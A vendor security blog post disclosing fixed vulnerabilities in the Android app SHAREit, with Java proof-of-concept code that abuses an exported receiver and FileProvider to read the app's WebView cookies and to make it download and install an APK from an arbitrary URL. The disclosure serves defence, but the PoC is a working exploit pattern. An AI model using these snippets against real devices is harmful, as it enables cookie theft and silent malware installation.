SHAREit Flaw Could Lead to Remote Code Execution

Update as of Feb 23, 2021, 9:24 P.M. E.T.: SHAREit has fixed the vulnerabilities mentioned in this blog entry. Users are advised to download the latest version of the app available in Google Play Store.

We discovered several vulnerabilities in the application named SHAREit . The vulnerabilities can be abused to leak a user’s sensitive data and execute arbitrary code with SHAREit permissions by using a malicious code or app. They can also potentially lead to Remote Code Execution (RCE). In the past, vulnerabilities that can be used to download and steal files from users’ devices have also been associated with the app. While the app allows the transfer and download of various file types, such as Android Package (APK), the vulnerabilities related to these features are most likely unintended flaws.

SHAREit has over 1 billion downloads in Google Play and has been named as one of the most downloaded applications in 2019. Google has been informed of these vulnerabilities.

Figure-1-SHAREit-download-page — Figure 1. SHAREit download page in Google Play

Figure-2-Additional-information-SHAREit — Figure 2. Additional information on the app shared in Google Play

Vulnerability details

We delved into the app’s code and found that it declares the broadcast receiver as “com.lenovo.anyshare.app.DefaultReceiver”. It receives the action "com.ushareit.package.action.install_completed" and Extra Intent then calls the startActivity() function.

Figure-3-SHAREit-intent — Figure 3. Code snippet of how SHAREit receives an Intent object

We built a proof-of-concept (POC) code to inspect the vulnerability. If the following code is run via another app on the device, it will show my Activity.

Figure-4-SHAREit-StartActivity — Figure 4. Crafting an Intent to let SHAREit run a StartActivity() function

Any app can invoke this broadcast component. This shows arbitrary activities, including SHAREit’s internal (non-public) and external app activities.

SHAREit also defines a FileProvider. The developer behind this disabled the exported attribute via android:exported="false", but enabled the android:grantUriPermissions="true" attribute. This indicates that any third-party entity can still gain temporary read/write access to the content provider's data.

Even worse, the developer specified a wide storage area root path. In this case, all files in the /data/data/<package> folder can be freely accessed.

The following code from our POC reads WebView cookies. This can also be used to write any files in the app’s data folder. In other words, it can be used to overwrite existing files in the SHAREit app.

public class MainActivity extends AppCompatActivity {

@Override

protected void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

setContentView(R.layout.activity_main);

handleIntent(getIntent());

}

protected void onNewIntent(Intent intent) {

super.onNewIntent(intent);

Log.d("demo", "onNewIntent");

handleIntent(intent);

}

private void handleIntent(Intent i) {

if(!"evil".equals(i.getAction())) {

Intent next = new Intent("evil");

next.setClassName(getPackageName(), getClass().getCanonicalName());

next.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION | Intent.FLAG_GRANT_READ_URI_PERMISSION); next.setData(Uri.parse("content://com.lenovo.anyshare.gps.fileProvider/root/data/user/0/com.lenovo.anyshare.gps/app_webview/Cookies"));

Intent intent = new Intent("com.ushareit.package.action.install_completed");

intent.setClassName("com.lenovo.anyshare.gps", "com.lenovo.anyshare.app.DefaultReceiver");

intent.setPackage("com.lenovo.anyshare.gps");//this enable other app receive the intent.

intent.putExtra("android.content.pm.extra.STATUS",-1);

intent.putExtra("android.content.pm.extra.STATUS_MESSAGE","useless");

intent.putExtra("android.intent.extra.INTENT",next);

sendBroadcast(intent);

Log.e("demo", "send broadcast done");

}

else {

try {

Log.d("demo", "Got url: " + i.getData());

InputStream in = getContentResolver().openInputStream(i.getData());

if (in != null) {

String out = this.convertStreamToString(in);

Log.d("demo", "Read cookies: " + out);

}

catch (Throwable th) {

throw new RuntimeException(th);

}

We found that SHAREit generates vdex/odex files after dex2oat when first launched. The app then loads these files directly in subsequent running. An attacker may craft a fake vdex/odex file, then replace those files via the abovementioned vulnerability to perform code execution.

Also, we noticed that SHAREit has set up deep links using URL leading to specific features in the app. These contain features that can download and install any APK.

Figure-5-SHAREit-deeplink — Figure 5. Code snippet showing SHAREit supporting the deep link feature

SHAREit declares a deep link feature that can download files from a URL that has the scheme of http/https and domain host that matches *.wshareit.com or gshare.cdn.shareitgames.com.

Figure-6-SHAREit-deeplink-feature-installing-APK — Figure 6. Code snippet showing SHAREit supporting the deep link feature for installing APK

It also provides a feature that can install an APK with the file name suffix sapk. This feature can be used to install a malicious app; if such is the case, it will enable a limited RCE when the user clicks on a URL.

To verify whether the above functionality is available in the Google Chrome browser, we built an href attribute in HTML. When the user clicks this download URL, Chrome will call SHAREit to download the sapk from http://gshare.cdn.shareitgames.com. Since it supports the HTTP protocol, this sapk can be replaced by simulating a man-in-the-middle (MitM) attack.

Figure-7-Download-spk — Figure 7. Code snippet showing the download of sapk

By doing so, the Malware.sapk (a sample file used here to represent malware) will be downloaded into the /sdcard/SHAREit/download/apps directory silently. To simulate this, we constructed an href.

Figure-8-APK-installation — Figure 8. Code snippet showing the installation of APK

However, the sapk installation notification does not pop-up. To check whether this intent can be received by SHAREit, we tried to send it to the app directly by using this code:

try {

Intent mytest = Intent.parseUri("intent:///sdcard/SHAREit/download/apps/Malware.sapk #Intent;action=android.intent.action.VIEW;scheme=content;package=com.lenovo.anyshare.gps;type=text/plain;end", 1);

Log.e("test", "intent: " + mytest);

this.startActivityIfNeeded(mytest, -1);

} catch (URISyntaxException e) {

Log.e("test", "url syntax error:" + e);

}

The result shows that SHAREit can accept this Intent and pop-up APK installation UI.

The reason for the unsuccessful operation through Chrome is that the browser intercepts this request. By reverse engineering, we found out that Chrome did discard content/file scheme Intent due to security concerns.

Even if the download and installation of APK by Chrome deep link were not successful, the same attack can still be performed by downloading the APK from an arbitrary URL and Install APK under an arbitrary path by using this code via a malicious app locally:

Intent next = new Intent();

next.setClassName("com.lenovo.anyshare.gps", "com.lenovo.anyshare.scheme.SchemeFilterActivity");

next.setData(Uri.parse("http://10.64.100.51:8080/ base.sapk")); // Arbitrary URL

startActivity(next);

Intent next1 = new Intent();

next1.setClassName("com.lenovo.anyshare.gps", "com.ushareit.ads.download.SapkInstallerActivity");

next1.setData(Uri.parse("content:///sdcard/SHAREit/download/apps/base.sapk/base.apk"));// Arbitrary path

startActivity(next1);

SHAREit is also susceptible to a man-in-the-disc (MITD) attack. This Is because when a user downloads the app in the download centre, it goes to the directory as shown in the sample code. The folder is an external directory, which means any app can access it with SDcard write permission.

Figure-9-Directory-download — Figure 9. Code snippet showing download to a directory

To illustrate, we manually copied Twitter.apk in the code to replace it with a fake file of the same name. As a result, a pop-up of the fake Twitter app will appear on the main screen of the SHAREit app.

Figure-10-Fake-twitter-app — Figure 10. A pop-up from the fake Twitter app created to test the vulnerability

Reopening the SHAREit app will cause the fake Twitter app to appear on the screen again to prompt the user to install it.

Figure-11-Fake-Twitter-app-download — Figure 11. Download prompt from the fake Twitter app created to test the vulnerability

Upon tapping the install button, the fake app will be installed successfully and opened automatically. This will show another system notification pop-up.

The external directory also has some directories that can be used to steal and replace files:

bullhead:/sdcard/SHAREit/download $ ls

apps audios files pictures videos

bullhead:/sdcard/SHAREit/download $

SHAREit is a game centre that provides game apps that can be downloaded by the configuration file GameSettings.xml located in the com.lenovo.anyshare.gps/shared_prefs directory.

For example, the xml content contains the link hxxp://cdn2[.]gamecenter[.]run/apk/extension/Av5PyuNY[.]apk.

Looking through this file shows that the download URLs are not only from Google Play, but also from other vendors. Most of the URLs use the HTTP protocol, and it is very dangerous to transfer data without encryption as these can be tampered with by a MitM attacker.

Recommendations

Security should be a top consideration for app developers, enterprises, and users alike. For safe mobile app use, we recommend regularly updating and patching mobile operating systems and the app themselves. Users should also keep themselves informed by reading reviews and articles about the apps they download.

SHAREit Flaw Could Lead to Remote Code Execution

Authors

Resources

Support

About Trend

Resources

Support

About Trend

The Americas

Middle East & Africa

Europe

Asia & Pacific